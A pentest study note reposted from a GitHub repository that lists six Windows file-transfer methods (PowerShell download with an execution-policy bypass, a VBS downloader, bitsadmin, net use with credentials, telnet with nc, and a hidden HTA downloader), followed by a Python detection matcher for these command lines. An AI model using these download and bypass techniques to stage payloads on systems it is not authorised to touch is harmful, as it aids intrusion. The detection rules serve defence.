Reposted from: https://github.com/l3m0n/pentest_study
Windows file transfer
1. PowerShell file download
Bypassing the PowerShell execution restriction: powershell -ExecutionPolicy Bypass -File .\1.ps1
$d = New-Object System.Net.WebClient
$d.DownloadFile("http://lemon.com/file.zip","c:/1.zip")
2. VBS script file download
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.206.101/file.zip",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\file.zip", 2
Run the script to download:
cscript test.vbs
3. BITSAdmin: not present when tested on win03, present on win08
bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip
4. File sharing: mapped a share, but it turned out there was no write permission
net use x: \\127.0.0.1\share /user:centoso.com\userID myPassword
5. Use Telnet to receive data
Server side: nc -lvp 23 < nc.exe
Download side: telnet ip -f c:\nc.exe
6. HTA: save as an .hta file, then run it
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.206.101/demo.php.zip",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\demo.zip", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION ID="test" WINDOWSTATE = "minimize">
</head>
<body>
</body>
</html>
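Detection side of the six methods above, as an added example that is not part of the original repository: a matcher run over process-creation command lines. The rule names, host names and sample events are constructed for illustration; the mshta rule assumes the .hta file is launched through its default handler, mshta.exe.

```python
import re

# Rule name -> pattern over a process-creation command line (for example
# Windows event 4688 or Sysmon event 1). One rule per transfer method in
# the list above; names and patterns are assumptions of this example.
RULES = {
    "powershell_policy_bypass": r"\bpowershell(\.exe)?\b.*\s-(ex[a-z]*|ep)\s+bypass\b",
    "powershell_webclient": r"\bpowershell(\.exe)?\b.*(net\.webclient|downloadfile)",
    "script_host_vbs": r"\b[cw]script(\.exe)?\b.*\.vbs\b",
    "bitsadmin_transfer": r"\bbitsadmin(\.exe)?\b.*\s/transfer\s",
    "net_use_inline_creds": r"\bnet1?(\.exe)?\s+use\b.*\\\\\S+.*\s/user:\S+\s+\S+",
    "telnet_log_to_file": r"\btelnet(\.exe)?\b.*\s-f\s+\S+",
    "mshta_or_hta": r"\bmshta(\.exe)?\b|\.hta\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}


def classify(cmdline):
    """Return the sorted rule names that match one command line."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(cmdline))


def scan(events):
    """Return (host, rules, cmdline) for every event that matches a rule."""
    hits = []
    for host, cmdline in events:
        rules = classify(cmdline)
        if rules:
            hits.append((host, rules, cmdline))
    return hits


# Constructed sample events (not real telemetry): the commands from the list
# above plus benign look-alikes that must not be flagged.
SAMPLE_EVENTS = [
    ("ws01", r"powershell -ExecutionPolicy Bypass -File .\1.ps1"),
    ("ws01", r"cscript test.vbs"),
    ("ws02", r"bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip"),
    ("ws02", r"net use x: \\127.0.0.1\share /user:centoso.com\userID myPassword"),
    ("ws03", r"telnet 192.0.2.10 -f c:\nc.exe"),
    ("ws03", r"mshta.exe C:\Users\Public\test.hta"),
    ("ws04", r"powershell Get-ChildItem C:\Temp"),
    ("ws04", r"bitsadmin /list"),
    ("ws04", r"net use"),
]

if __name__ == "__main__":
    for host, rules, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)} <- {cmdline}")
```

The net use rule fires only when a password follows /user: on the command line, which is also the case where the credential ends up in process-creation logs.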